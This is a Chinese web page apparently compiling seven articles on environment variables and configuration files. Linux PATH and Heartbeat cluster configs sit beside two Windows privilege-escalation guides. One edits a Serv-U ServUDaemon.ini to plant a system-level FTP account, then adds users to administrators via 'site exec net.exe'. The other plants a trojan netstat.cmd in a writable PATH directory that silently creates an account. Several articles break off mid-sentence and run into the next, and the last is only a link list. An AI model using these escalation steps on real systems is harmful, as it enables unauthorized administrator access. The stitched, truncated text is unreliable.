Linux中环境变量配置文件详解(共7篇)
环境变量是和Shell紧密相关的,用户登录系统后就启动了一个Shell,对于Linux来说一般是bash,但也可以重新设定或切换到其它的 Shell。对于UNIX,可能是CShelll。环境变量是通过Shell命令来设置的,设置好的环境变量又可以被所有当前用户所运行的程序所使用。对于bash这个Shell程序来说,可以通过变量名来访问相应的环境变量,通过export来设置环境变量。下面通过几个实例来说明。
一.系统级:
1)etc/profile:此文件为系统的每个用户设置环境信息,当用户2:Servu配置文件详解和提权
Serv-U在设置用户以后会把配置信息存储与ServUDaemon.ini文件中,包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U 的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。
假设本地受限用户可以浏览Serv-U 的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:
[GLOBAL]
Version=4.1.0.0 // Serv-U Ftp Server 版本号
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/
AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB
ReloadSettings=True
#在修改INI文件后需加入此项,这时SERV-U会自动刷新配置文件并生效,此项随之消失.再有修改再次添加
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP以及域名,端口情况
[Domain1]
User1=hackgg|1|0
[USER=hackgg|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c: // 可以浏览的目录
TimeOut=600
Access1=C:|RWAMLCDP
按规范添加一个用户,并且修改为
TimeOut=600
Maintenance=System //权限类型 多加一行 指定新加帐号为系统管理员
Access1=C:|RWAMELCDP 这里填系统所在盘符
#必填.密码.算法为随机产生2个字符,如hr.将hr 明文密码(如test)使用MD5加密,如MD5(“hrtest”,生成密码后将所有小写字符变为大写
#在最前加上这两个随机字符”hr” ”1589A4F0334FDF55D52F26DFA2D3CCEB”,生成最终密码
标准的serv-u用户配置段例
[Domain1]
User1=admin|1|0
User2=test|1|0
[USER=admin|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=g:
RelPaths=
DiskQuota=1|153600000|0
TimeOut=600
Access1=g:|RWAMLCDP
[USER=test|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=f:test
RelPaths=
DiskQuota=1|153600000|0
TimeOut=600
Access1=f:test|RWAMLCDP
以下这一行是权限设置,解释一下各参数代表的含义
Access1=g: RWAMELCDP
#必填.对于目录的存储权限,默认权限为RWAMLCDP.权限排列无需按照顺序.
# 格式 Access序号 = 目录 权限
#R 读取
#W 写入
#A 附加
#M 修改
#E 执行–由于安全原因,所有帐号均不能开启此权限
#L 目录列表
#C 建立目录
#D 删除目录
#P 将权限继承给子目录
建帐号成功后开始利用
ftp>cd system32 //进入system32目录
250 Directory changed to /WINDOWS/system32
ftp>quote site exec net.exe user sasa 1111 /add //利用系统的net.exe文件加用户,
ftp>quote site exec net.exe localhost administrators pchack /add //提升为超级用户
篇3:详解如何在提权中利用环境变量
首先,我们先了解下什么叫环境变量!
环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,比如临时文件夹位置和系统文件夹位置等等,这点有点类似于DOS时期的默认路径,当你运行某些程时序除了在当前文件夹中寻找外,还会到设置的默认路径中去查找。比如说环境变量中的“Path”就是一个变量,里面存储了一些常用命令所存放的目录路径。
查看系统当前的环境变量,可以使用SET命令查看!
下面是执行SET命令后反馈的信息
ALLUSERSPROFILE=C:Documents and SettingsAll Users
APPDATA=C:Documents and SettingsAdministratorApplication Data
CLIENTNAME=Console
CommonProgramFiles=C:Program FilesCommon Files
COMPUTERNAME=145F63CA0A6F46D
ComSpec=C:WINDOWSsystem32cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=Documents and SettingsAdministrator
LOGONSERVER=145F63CA0A6F46D
NUMBER_OF_PROCESSORS=2
S=Windows_NT
Path=D:Progra~1BorlandDelphi7Bin;D:Progra~1BorlandDelphi7ProjectsBpl;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 6, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f06
ProgramFiles=C:Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:WINDOWS
TEMP=C:DOCUME~1ADMINI~1LOCALS~1Temp
TMP=C:DOCUME~1ADMINI~1LOCALS~1Temp
USERDOMAIN=145F63CA0A6F46D
USERNAME=Administrator
USERPROFILE=C:Documents and SettingsAdministrator
windir=C:WINDOWS
======================================================================
我们知道,当我们把NC一类的常用小工具放在SYSTEM32时,不管我们当前路径在哪,都可以执行NC命令!------Hacking中也提供了不少方便,不是么?
其实这就是 Path 变量所起的作用了!
如果将Path变量中的内容全部删除,那么原来的系统命令系统都将无法识别了,
也就是说,当我们在CMD中输入些命令时,系统将以如下顺序查找相关程序,来达到直接调用程序或文件的目的!
1.当前目录下的可执行文件!
2.依次查找Path变量中的所指定的目录!
OK,在大体认识了环境变量后,我们开始切入主题,谈谈如何利用环境变量为我们的Hacking提供便利。
我们知道PERL安装后会在变量Path内容的最前面加入c:perlbin //目录依安装而定
而当管理员权限配置不当时,会疏忽此目录的权限配置(默认权限配置,各WIN操作系统均有写权限),也就给我们创造了提权的条件。
下面我举个利用的例子!
//是否可利用,取决于Path变量的位置以及该目录是否可写
//环境变量一定要在系统自带环境变量之前。
假设条件如下:
目标安装了PERL,且目录为c:perlbin
//目录可写
系统环境变量中的Path变量内容如下
Path=c:perlbin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem
我们可以在该目录下创建如下文件
Netstat.cmd
or
Netstat.bat //常用系统命令亦可,请自己举一反三!THX~
文件内容如下
@net user netpatch nspcn.org /add>nul
Rem 命令一定要记得加 @ 结尾加
>nul
Rem @是为了隐藏命令本身
Rem >nul 是为了隐藏命令执行完后的结果反馈!
@%systemroot%system32netstat.exe %1 %2 %3 %4 %5 %6
Rem 学过批处理命令的同学应该知道这后面的%1 %2 %3等,是起 参数的作用
当管理员执行命令时,由于Path变量中c:perlbin位于系统环境变量的前面,所以,当管理员执行Netstat命令时,系统会首先找当前目录下的可执行文件,默认也就是”C:Documents and SettingsAdministrator” (依登陆用户而定)当没找到Netstat程序时,就会接着依次寻找环境变量中的Path变量中所定义的目录,4:Linux下设置环境变量各配置文件的区别
/etc/profile:此文件为系统的每个用户设置环境信息,当用户5:Linux中修改环境变量PATH
PATH的值是一系列目录,当您运行一个程序时,Linux在这些目录下进行搜寻,用以下命令可以看到 PATH的值。
$ echo $PATH
例如,在主机中,用户yogin的PATH值为:
/opt/kde/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/yogin/bin
其中“:”为分隔符。所以,上面的一串目录可以看成是如下的目录列表。
/opt/kde/bin
/usr/local/bin
/bin:/usr/bin
/usr/X11R6/bin
/home/yogin/bin
同样,也是主机中,用户root的PATH值为:
/opt/kde/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
要修改所有用户的PATH值,您可以以root身份编辑/etc/profile文件,修改其中包含 “PATH=”的一行,
例如,您可以使用pico编辑器打开/etc/profile文件。
$ pico -w /etc/profile
pico是一个文本编辑器,而-w选项关闭了长行回绕功能。
只有在用户重新注册后,PATH的新值才会生效。如果只是要修改某一个用户的PATH值,就应该编辑该 用户主目录中的.bash-profile文件。
如果您想将当前目录加入到PATH中,则将“.”加入PATH中,此时PATH的设定如下:
PATH=“$PATH:/usr/X11R6/bin:.”
export PATH
注意:在修改了PATH值或任何环境变量后,都要用export将其输出,新的PATH值才能生效。
篇6:Heartbeat 中的三个配置文件。Unix系统
之前没搞过Heartbeat的双机,今天在VMWare上试了一下,效果还可以, 一:安装程序: 先安装以下程序: ipvsadm-1.21-1.rh.el.1.i386.rpm ipvsadm-debuginfo-1.21-1.rh.el.1.i386.rpm libnet-1.1.0-1.rh.el.1.i386.rpm libnet-debuginfo-1.1.0-1.rh.el.1.i386.
之前没搞过Heartbeat的双机,今天在VMWare上试了一下,效果还可以。一:安装程序:
先安装以下程序:
ipvsadm-1.21-1.rh.el.1.i386.rpm
ipvsadm-debuginfo-1.21-1.rh.el.1.i386.rpm
libnet-1.1.0-1.rh.el.1.i386.rpm
libnet-debuginfo-1.1.0-1.rh.el.1.i386.rpm
perl-Authen-SASL-2.03-1.rh.el.um.1.noarch.rpm
perl-Convert-ASN1-0.16-2.rh.el.um.1.noarch.rpm
perl-Digest-HMAC-1.01-11.1.noarch.rpm
perl-Digest-SHA1-2.01-15.1.i386.rpm
perl-IO-Socket-SSL-0.92-1.rh.el.um.1.noarch.rpm
perl-ldap-0.2701-1.rh.el.um.1.noarch.rpm
perl-Mail-IMAPClient-2.2.7-1.rh.el.um.1.noarch.rpm
perl-Net-SSLeay-1.23-1.rh.el.um.1.i386.rpm
perl-Net-SSLeay-debuginfo-1.23-1.rh.el.um.1.i386.rpm
perl-Parse-RecDescent-1.80-1.rh.el.um.1.noarch.rpm
perl-XML-NamespaceSupport-1.08-1.rh.el.um.1.noarch.rpm
77,255 perl-XML-SAX-0.12-1.rh.el.um.1.noarch.rpm
然后再安装以下程序:
heartbeat-ldirectord-1.2.3-2.rh.el.3.0.i386.rpm
heartbeat-1.2.3-2.rh.el.3.0.i386.rpm
heartbeat-pils-1.2.3-2.rh.el.3.0.i386.rpm
heartbeat-stonith-1.2.3-2.rh.el.3.0.i386.rpm
二:配置文件:
/etc/hosts
127.0.0.1 localhost.localdomain localhost
192.168.247.160 ha1.chess.gz ha
192.168.247.161 ha2.chess.gz ha2
192.168.247.180 ha.chess.gz ha
/etc/ha.d/authkeys
#
# Authentication file. Must be mode 600
#
#
# Must have exactly one auth directive at the front.
# auth send authentication using this method-id
#
# Then, list the method and key that go with that method-id
#
# Available methods: crc sha1, md5. Crc doesn't need/want a key.
#
# You normally only have one authentication method-id listed in this file
#
# Put more than one to make a smooth transition when changing auth
# methods and/or keys.
#
#
# sha1 is believed to be the “best”, md5 next best.
#
# crc adds no security, except from packet corruption.
# Use only on physically secure networks.
#
auth
1 crc
#2 sha1 HI!
#3 md5 Hello!
/etc/ha.d/ha.cf
#
# There are lots of options in this file. All you have to have is a set
# of nodes listed {“node ...} one of {serial, bcast, mcast, or ucast},
# and a value for ”auto_failback“.
#
# ATTENTION: As the configuration file is read line by line,
# THE ORDER OF DIRECTIVE MATTERS!
#
# In particular, make sure that the udpport, serial baud rate
# etc. are set before the heartbeat media are defined!
# debug and log file directives go into effect when they
# are encountered.
#
# All will be fine if you keep them ordered as in this example.
#
#
# Note on logging:
# If any of debugfile, logfile and logfacility are defined then they
# will be used. If debugfile and/or logfile are not defined and
# logfacility is defined then the respective logging and debug
# messages will be loged to syslog. If logfacility is not defined
# then debugfile and logfile will be used to log messges. If
# logfacility is not defined and debugfile and/or logfile are not
# defined then defaults will be used for debugfile and logfile as
# required and messages will be sent there.
#
# File to write debug messages to
debugfile /var/log/ha-debug
#
#
# File to write other messages to
#
logfile /var/log/ha-log
#
#
# Facility to use for syslog/logger
#
logfacility local0
#
#
# A note on specifying ”how long“ times below...
#
# The default time unit is seconds
# 10 means ten seconds
#
# You can also specify them in milliseconds
# 1500ms means 1.5 seconds
#
#
# keepalive: how long between heartbeats?
#
keepalive 2
#
# deadtime: how long-to-declare-host-dead?
#
# If you set this too low you will get the problematic
# split-brain (or cluster partition) problem.
# See the FAQ for how to use warntime to tune deadtime.
#
deadtime 10
#
# warntime: how long before issuing ”late heartbeat“ warning?
# See the FAQ for how to use warntime to tune deadtime.
#
warntime 10
#
#
# Very first dead time (initdead)
#
# On some machines/OSes, etc. the network takes a while to come up
# and start working right after you've been rebooted. As a result
# we have a separate dead time for when things first come up.
# It should be at least twice the normal dead time.
#
initdead 120
#
#
# What UDP port to use for bcast/ucast communication?
#
udpport 694
#
# Baud rate for serial ports...
#
#baud 19200
#
# serial serialportname ...
#serial /dev/ttyS0 #Linux
#serial /dev/cuaa0 # FreeBSD
#serial /dev/cua/a # Solaris
#
#
# What interfaces to broadcast heartbeats over?
#
#bcast eth0 # Linux
#bcast eth1 eth2 # Linux
#bcast le0 # Solaris
#bcast le1 le2 # Solaris
bcast eth
#
# Set up a multicast heartbeat medium
# mcast [dev] [mcast group] [port] [ttl] [loop]
#
# [dev] device to send/rcv heartbeats on
# [mcast group] multicast group to join (class D multicast address
# 224.0.0.0 - 239.255.255.255)
# [port] udp port to sendto/rcvfrom (set this value to the
# same value as ”udpport“ above)
# [ttl] the ttl value for outbound heartbeats. this effects
# how far the multicast packet will propagate. (0-255)
# Must be greater than zero.
# [loop] toggles loopback for outbound multicast heartbeats.
# if enabled, an outbound packet will be looped back and
# received by the interface it was sent on. (0 or 1)
# Set this value to zero.
#
#
#mcast eth0 225.0.0.1 694 1 0
mcast eth1 225.0.0.1 694 1 0
#
# Set up a unicast / udp heartbeat medium
# ucast [dev] [peer-ip-addr]
#
# [dev] device to send/rcv heartbeats on
# [peer-ip-addr] IP address of peer to send packets to
#
#ucast eth0 192.168.1.2
#
#
# About boolean values...
#
# Any of the following case-insensitive values will work for true:
# true, on, yes, y,
# Any of the following case-insensitive values will work for false:
# false, off, no, n, 0
#
#
#
# auto_failback: determines whether a resource will
# automatically fail back to its ”primary“ node, or remain
# on whatever node is serving it until that node fails, or
# an administrator intervenes.
#
# The possible values for auto_failback are:
# on - enable automatic failbacks
# off - disable automatic failbacks
# legacy - enable automatic failbacks in systems
# where all nodes do not yet support
# the auto_failback option.
#
# auto_failback ”on“ and ”off“ are backwards compatible with the old
# ”nice_failback on“ setting.
#
# See the FAQ for information on how to convert
# from ”legacy“ to ”on“ without a flash cut.
# (i.e., using a ”rolling upgrade“ process)
#
# The default value for auto_failback is ”legacy“, which
# will issue a warning at startup. So, make sure you put
# an auto_failback directive in your ha.cf file.
# (note: auto_failback can be any boolean or ”legacy“)
#
auto_failback on
#
#
# Basic STONITH support
# Using this directive assumes that there is one stonith
# device in the cluster. Parameters to this device are
# read from a configuration file. The format of this line is:
#
# stonith
#
# NOTE: it is up to you to maintain this file on each node in the
# cluster!
#
#stonith baytech /etc/ha.d/conf/stonith.baytech
#
# STONITH support
# You can configure multiple stonith devices using this directive.
# The format of the line is:
# stonith_host
#
# to or * to mean it is aclearcase/” target=“_blank” >ccessible from any host.
#
# supported drives is in /usr/lib/stonith.)
#
are driver specific parameters. To see the
# format for a particular device, run:
# stonith -l -t
#
#
# Note that if you put your stonith device access information in
# here, and you make this file publically readable, you're asking
# for a denial of service attack ;-)
#
# To get a list of supported stonith devices, run
# stonith -L
# For detailed information on which stonith devices are supported
# and their detailed configuration options, run this command:
# stonith -h
#
#stonith_host * baytech 10.0.0.3 mylogin mysecretpassword
#stonith_host ken3 rps10 /dev/ttyS1 kathy 0
#stonith_host kathy rps10 /dev/ttyS1 ken3 0
#
# Watchdog is the watchdog timer. If our own heart doesn't beat for
# a minute, then our machine will reboot.
# NOTE: If you are using the software watchdog, you very likely
# wish to load the module with the parameter “nowayout=0” or
# compile it without CONFIG_WATCHDOG_NOWAYOUT set. Otherwise even
# an orderly shutdown of heartbeat will trigger a reboot, which is
# very likely NOT what you want.
#
watchdog /dev/watchdog
#
# Tell what machines are in the cluster
# node nodename ... -- must match uname -n
#node ken3
#node kathy
node ha1.chess.gz
node ha2.chess.gz
#
# Less common options...
#
# Treats 10.10.10.254 as a psuedo-cluster-member
# Used together with ipfail below...
#
#ping 10.10.10.254
#
# Treats 10.10.10.254 and 10.10.10.253 as a psuedo-cluster-member
# called group1. If either 10.10.10.254 or 10.10.10.253 are up
# then group1 is up
# Used together with ipfail below...
#
#ping_group group1 10.10.10.254 10.10.10.253
#
# Processes started and stopped with heartbeat. Restarted unless
# they exit with rc=100
#
#respawn userid /path/name/to/run
#respawn hacluster /usr/lib/heartbeat/ipfail
#
# Access control for client api
# default is no access
#
#apiauth client-name gid=gidlist uid=uidlist
#apiauth ipfail gid=haclient uid=hacluster
###########################
#
# Unusual options.
#
###########################
#
# hopfudge maximum hop count minus number of nodes in config
#hopfudge
#
# deadping - dead time for ping nodes
#deadping 30
#
# hbgenmethod - Heartbeat generation number creation method
# Normally these are stored on disk and incremented as needed.
#hbgenmethod time
#
# realtime - enable/disable realtime execution (high priority, etc.)
# defaults to on
#realtime off
#
# debug - set debug level
# defaults to zero
#debug
#
# API Authentication - replaces the fifo-permissions-based system of the past
#
#
# You can put a uid list and/or a gid list.
# If you put both, then a process is authorized if it qualifies under either
# the uid list, or under the gid list.
#
# The groupname “default” has special meaning. If it is specified, then
# this will be used for authorizing groupless clients, and any client groups
# not otherwise specified.
#
#apiauth ipfail uid=hacluster
#apiauth ccm uid=hacluster
#apiauth ping gid=haclient uid=alanr,root
#apiauth default gid=haclient
# message format in the wire, it can be classic or netstring, default is classic
###########################
#
# hopfudge maximum hop count minus number of nodes in config
#hopfudge
#
# deadping - dead time for ping nodes
#deadping 30
#
# hbgenmethod - Heartbeat generation number creation method
# Normally these are stored on disk and incremented as needed.
#hbgenmethod time
#
# realtime - enable/disable realtime execution (high priority, etc.)
# defaults to on
#realtime off
#
# debug - set debug level
# defaults to zero
#debug
#
# API Authentication - replaces the fifo-permissions-based system of the past
#
#
# You can put a uid list and/or a gid list.
# If you put both, then a process is authorized if it qualifies under either
# the uid list, or under the gid list.
#
# The groupname “default” has special meaning. If it is specified, then
# this will be used for authorizing groupless clients, and any client groups
# not otherwise specified.
#
#apiauth ipfail uid=hacluster
#apiauth ccm uid=hacluster
#apiauth ping gid=haclient uid=alanr,root
#apiauth default gid=haclient
# message format in the wire, it can be classic or netstring, default is classic
#msgfmt netstring
/etc/ha.d/haresources
#
# This is a list of resources that move from machine to machine as
# nodes go down and come up in the cluster. Do not include
# “administrative” or fixed IP addresses in this file.
#
#
# The haresources files MUST BE IDENTICAL on all nodes of the cluster.
#
# The node names listed in front of the resource group information
# is the name of the preferred node to run the service. It is
# not necessarily the name of the current machine. If you are running
# auto_failback ON (or legacy), then these services will be started
# up on the preferred nodes - any time they're up.
#
# If you are running with auto_failback OFF, then the node information
# will be used in the case of a simultaneous start-up, or when using
# the hb_standby command.
#
# BUT FOR ALL OF THESE CASES, the haresources files MUST BE IDENTICAL.
# If your files are different thenalmost certainly something
# won't work right.
#/>
#
#
# We refer to this file when we're coming up, and when a machine is being
# taken over after going down.
#
# You need to make this right for your installation, then install it in
# /etc/ha.d
#
# Each logical line in the file constitutes a “resource group”.
# A resource group is a list of resources which move together from
# one node to another - in the order listed. It is assumed that there
# is no relationship between different resource groups. These
# resource in a resource group are started left-to-right, and stopped
# right-to-left. Long lists of resources can be continued from line
# to line by ending the lines with backslashes (“”).
#
# These resources in this file are either IP addresses, or the name
# of scripts to run to “start” or “stop” the given resource.
#
# The format is like this:
#
#node-name resource1 resource2 ... resourceN
#
#
# If the resource name contains an :: in the middle of it, the
# part after the :: is passed to the resource script. as an argument.
# Multiple arguments are separated by the :: delimeter
#
# In the case of IP addresses, the resource script. name IPaddr is
# implied.
#
# For example, the IP address 135.9.8.7 could also be represented
# as IPaddr::135.9.8.7
#
# THIS IS IMPORTANT!! vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
#
# The given IP address is directed to an interface which has a route
# to the given address. This means you have to have a net route
# set up outside of the High-Availability structure. We don't set it
# up here -- we key off of it.
#
# The broadcast address for the IP alias that is created to support
# an IP address defaults to the highest address on the subnet.
#
# The netmask for the IP alias that is created defaults to the same
# netmask as the route that it selected in in the step above.
#
# The base interface for the IPalias that is created defaults to the
# same netmask as the route that it selected in in the step above.
#
# If you want to specify that this IP address is to be brought up
# on a subnet with a netmask of 255.255.255.0, you would specify
# this as IPaddr::135.9.8.7/24 .
#
# If you wished to tell it that the broadcast address for this subnet
# was 135.9.8.210, then you would specify that this way:
# IPaddr::135.9.8.7/24/135.9.8.210
#
# If you wished to tell it that the interface to add the address to
# is eth0, then you would need to specify it this way:
# IPaddr::135.9.8.7/24/eth0
#
# And this way to specify both the broadcast address and the
# interface:
# IPaddr::135.9.8.7/24/eth0/135.9.8.210
#
# The IP addresses you list in this file are called “service” addresses,
# since they're they're the publicly advertised addresses that clients
# use to get at highly available services.
#
# For a hot/standby (non load-sharing) 2-node system with only
# a single service address,
# you will probably only put one system name and one IP address in here.
# The name you give the address to is the name of the default “hot”
# system.
#
# Where the nodename is the name of the node which “normally” owns the
# resource. If this machine is up, it will always have the resource
# it is shown as owning.
#
# The string you put in for nodename must match the uname -n name
# of your machine. Depending on how you have it administered, it could
# be a short name or a FQDN.
#
#-------------------------------------------------------------------
#
# Simple case: One service address, default subnet and netmask
# No servers that go up and down with the IP address
#
#just.linux-ha.org 135.9.216.110
#
#-------------------------------------------------------------------
#
# Assuming the adminstrative addresses are on the same subnet...
# A little more complex case: One service address, default subnet
# and netmask, and you want to start and stop http when you get
# the IP address...
#
#just.linux-ha.org 135.9.216.110 http
#-------------------------------------------------------------------
#
#-------------------------------------------------------------------
#
# A little more complex case: Three service addresses, default subnet
# and netmask, and you want to start and stop http when you get
# the IP address...
#
#just.linux-ha.org 135.9.216.110 135.9.215.111 135.9.216.112 httpd
#-------------------------------------------------------------------
#
# One service address, with the subnet, interface and bcast addr
# explicitly defined.
#
#just.linux-ha.org 135.9.216.3/28/eth0/135.9.216.12 httpd
#
#-------------------------------------------------------------------
#
# An example where a shared filesystem is to be used.
# Note that multiple aguments are passed to this script. using
# the delimiter '::' to separate each argument.
#
#node1 10.0.0.170 Filesystem::/dev/sda1::/data1::ext2
#
# Regarding the node-names in this file:
#
# They must match the names of the nodes listed in ha.cf, which in turn
# must match the `uname -n` of some node in the cluster. So they aren't
# virtual in any sense of the word.
#
ha1.chess.gz 192.168.247.180 Filesystem::/dev/sdb2::/::ext3::rw httpd Filesystem::/dev/sdb1::/exports::/exports::ext3::rw nfs
原文转自:.ltesting.net
篇7:Python中for循环详解
最近更 新
Python的print用法示例
Python MD5文件生成码
从零学Python之入门(三)序列
Python 元类使用说明
python调用windows api锁定计算机示例
Python交换变量
Python中条件选择和循环语句使用方法介绍
Python ORM框架SQLAlchemy学习笔记之映射
python 实现堆排序算法代码
python中查找excel某一列的重复数据 剔除
热 点 排 行
Python入门教程 超详细1小时学会
python 中文乱码问题深入分析
比较详细Python正则表达式操作指
Python字符串的encode与decode研
Python open读写文件实现脚本
Python enumerate遍历数组示例应
Python 深入理解yield
Python Django在windows下的开发
python 文件和路径操作函数小结
python 字符串split的用法分享